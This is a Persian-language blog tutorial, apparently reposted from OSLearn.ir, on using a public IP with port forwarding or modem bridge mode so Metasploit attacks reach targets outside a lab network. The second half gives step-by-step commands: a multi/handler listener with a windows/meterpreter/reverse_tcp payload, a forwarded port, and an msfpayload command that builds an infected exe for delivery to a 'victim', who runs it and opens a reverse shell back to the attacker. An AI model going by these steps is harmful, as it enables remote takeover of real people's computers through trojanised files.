منبع اصلی نوشتار زیر در این لینک قرار دارد

استفاده از آی پی ولید در متااسپلویت

با سلام . خوشبختانه یا متاسفانه فیلم های آموزشی ای که از کار با متااسپلویت هست اکثرا در شرایط آزمایشگاهی و در داخل شبکه می باشد . نکته این جاست که برای پیاده سازی حملات در شرایط واقعی باید آی پی ولید داشت . تاکید می کنم که آی پی ولید نه آی پی استاتیک .

بعضی از ISP ها به صورت پیش فرض آی پی ولید را در اختیار کاربران قرار می دهند اما خیلی از ISP ها مبلغی را برای تهیه ی آی پی ولید و یا استاتیک در نظر گرفته اند .

در این جا ما دو حالت زیر را بررسی می کنیم :

حالت اول :‌ استفاده از Port Forwarding
حالت دوم : استفاده از حالت Bridge

حالت اول :

در حالت اول IP ولیدی که سرور DHCP ی ISP در اختیار ما می گذارد بر روی مودم ست شده است . یعنی اگر هر کسی از هر جای دنیا با هر نوع IP ای , آدرس IP ما را در مرورگر خود باز کند صفحه ی کانفیگ مودم ما برای آن شخص به نمایش در می آید .

البته با فرض این که مودم ما روی پورت 80 سرویس می دهد .

در این حالت سیستم ها آی پی دورن شبکه ای می گیرند مثلا 192.168.1.2 و یا 192.168.1.3 و …

برای پیاده سازی حملات در این حالت باید از Port Forwarding استفاده کرد . برای مثال سیستم داخلی ما روی پورت 2323 سرویس می دهد یعنی سیستم ما با آدرس آی پی 192.168.1.2 روی پورت 2323 سرویس می دهد .

طبیعتا هیچ کس نمی تواند با سیستم ما ( 192.168.1.2 ) روی پورت 2323 ارتباط برقرار کند مگر این که Port Forwarding روی مودم برای سیستم ما انجام شده باشد .

به صورت خلاصه کار Port Forwarding به این صورت است که تمامی درخواست های دریافت شده روی IP بر روی پورت 2323 را به سیستم 192.168.1.2 هدایت می کند .

پس در نتیجه این IP اصلی و مودم نیست که روی پورت 2323 سرویس می دهد بلکه این دو فقط نقش واسطه رو بازی می کنند و همان طور که گفته شد تمامی درخواست های روی پورت 2323 را به سیستم ما یعنی 192.168.1.2 هدایت می کند .

نکته : پورت 2323 ذکر شده در بالا مثال می باشد .

حالت دوم :

در حالت دوم مودم روی bridge mode قرار می گیرد و شخص برای اتصال به اینترنت باید یک کانکشن در سیستم اصلی خود ایجاد کند و نام کاربری و رمزعبوری که ISP در اختیار آن قرار می دهد را وارد کند .

در این حالت یک اینترفیس به نام PPP ( در ویندوز ) و ppp0 و یا … ( در لینوکس ) در سیستم ایجاد می شود و پس از اتصال آی پی ای که از طرف ISP تخصیص داده می شود در سیستم قابل مشاهده است .

002
در این حالت هر کسی در هر جای دنیا با هر نو IP ای می تواند با IP ما در ارتباط باشد . نکته ی اساسی این جاست که این ارتباط کاملا بستگی به رفتار سیستم عامل ما دارد . اجازه دهید جمله ی بالا را در قالب مثال توضیح دهم .

مثال اول :

من یک ویندوز XP دارم و تنظیمات مودم هم روی حالت bridge هست و با کانکشنی که در داخل ویندوز ساخته ام توانسته ام به اینترنت متصل بشم .

برای بررسی آی پی در داخل CMD به این صورت عمل می کنم :

ipconfig

حال اگر من سرویس RDP یعنی همان ریموت دسکتاپ یا به طور دقیق تر Remote Desktop Protocol را فعال کنم و پورت پیش فرض این پروتکل یعنی 3389 را روی سیستم باز کنم , نتیجه این می شود که هر کسی می توان با استفاده از این پروتکل یعنی RDP با سیستم من ارتباط برقرار کند .

مثال دوم :

من یک ویندوز 7 دارم و تنظیمات مودم هم روی حالت bridge هست و با کانکشنی که در داخل ویندوز ساخته ام توانسته ام به اینترنت متصل بشم .

ابتدا همانند مثال اول برای بررسی آی پی در داخل CMD به این صورت عمل می کنم :

ipconfig

حال اگر File and Printer Sharing در سیستم عامل من فعال باشد , هر کسی می توان از آدرس آی پی من ping بگیرد یعنی به صورت دقیق تر پکت هایی از جنس ICMP ارسال و جواب هر یک را دریافت کند .

برای فعال کردن File and Printer Sharing در ویندوز 7 به این صورت عمل می کنیم :

1. ابتدا به مسیر زیر می رویم :

Control PanelSystem and SecurityWindows Firewall

2. سپس بر روی گزینه ی Allow a program or feature through Windows Firewall کلیک کنید .

3. در پنجره ی باز شده تیک عبارت File and Printer Sharing را بگذارید .

حال یک بار پینگ می گیریم , به عکس زیر نگاه کنید :

003

همان طور که انتظار می رفت با فعال بودن File and Printer Sharing هر کسی می تواند از آدرس آی پی ولید من ping بگیرد و یا به معنای دیگر پکت هایی از جنس ICMP ارسال و جواب هر یک را دریافت کند .

تفاوت بین حالت اول و دوم :

برای پیاده سازی حملات با استفاده از متااسپلویت فرقی بین این دو حالت نیست یعنی روی هر دوی این حالت جواب خواهیم گرفت اما در کل می توان گفت استفاده از Port Forwarding شاید بهتر باشد .

حال اجازه دهید همین روند را در قالب یک مثال در متااسپلویت بررسی کنیم .

ابتدا وارد کنسول متااسپلویت شوید سپس اکسپلویت زیر را فراخوانی کنید :

msf > use exploit/multi/handler

در مرحله ی بعد یک پایلود مناسب انتخاب می کنیم . برای مثال :

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

حال کافیست دو مقدار LHOST و LPORT را متناسب با سیستم خودمون ست کنیم . برای مثال :

set lhost 192.168.1.2

set lport 2323

و در آخر برای اجرا کافیست عبارت زیر را تایپ و اجرا کنیم :

exploit -j

 

004

برای بررسی بیش تر یک ترمینال باز کرده و به صورت زیر عمل کنید :

netstat -antp | grep :2323

اگر مراحل را موفقیت آمیز طی کرده باشید خواهید دید که آی پی داخلی شما همراه با پورت 2323 روی حالت LISTEN قرار دارد .

tcp        0      0 192.168.1.2:2323        0.0.0.0:*               LISTEN      11939/ruby

نکته :‌ توجه داشته باشید که آدرس آی پی 192.168.1.2 داخلی و مربوط به سیستم ما می باشد .

در مرحله ی بعد باید این پورت یعنی 2323 باز شده و هدایت شود روی آی پی 192.168.1.2 . پس وارد قسمت port forwarding مودم خودتون بشید و تغییرات بالا را اعمال کنید .

همان طور که قبلا هم گفته شد , این کار باعث می باشد تمامی درخواست ها روی پورت 2323 به آدرس آی پی داخلی 192.168.1.2 هدایت شود .

و اما مرحله ی آخر . در این مرحله شل کد را در قلب یک فایل exe به قربانی تحویل می دهیم , برای این منظور یعنی ساخت یک فایل exe آلوده به صورت زیر عمل می کنیم :

msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=2323 X > File.exe

نکته : توجه داشته باشید که به جای IP باید آدرس آی پی اصلی ( external ) خودتون یعنی آی پی ای که از سمت ISP دریافت می کنید را قرار دهید .

برای مثال به عکس زیر توجه کنید :

007

حال کافیست این فایل exe بر روی سیستم قربانی اجرا شود تا یک نشست بین سیستم شما و قربانی ایجاد شود .

005

نکته :‌ در سناریو بالا ارتباطی که بین سیستم قربانی و سیستم ما برقرار شد , یک ارتباط reverse بود دلیل این موضوع هم پایلودی بود که ست کردیم . دقت کنید : reverse_tcp یک ارتباط reverse روی پروتکل tcp

نکته : بعد از این که قربانی فایل exe را اجرا کرد , یک cmd در سیستم قربانی باز کنید و به صورت زیر عمل کنید :

netstat

طبیعتا خواهید دید که سیستم قربانی روی یک پورت ( Random ) به آی پی ما روی پورت 2323 متصل شده است . برای مثال به عکس زیر توجه کنید :

006

192.168.1.4 آدرس آی پی شبکه ای سیستم قربانی می باشد

X09.X62.X66.X6 آدرس آی پی اصلی ما که از طرف ISP تخصیص داده شده است

 

 

منبع : او اس لرن دات آی آر | http://OSLearn.ir

نویسنده :E2MA3Nبرچسب ها : ,